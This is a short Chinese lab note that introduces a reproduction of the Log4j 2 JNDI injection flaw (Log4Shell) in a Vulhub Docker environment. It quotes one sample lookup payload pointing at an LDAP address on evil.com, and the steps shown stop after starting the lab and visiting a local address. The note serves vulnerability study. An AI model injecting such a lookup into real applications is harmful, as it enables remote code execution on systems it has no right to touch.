Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。
参考地址:
https://github.com/vulhub/vulhub
本次漏洞复现基于Vulhub
1.启动vulhub
Docker-compose up -d
2.访问地址172.16.7.155:8983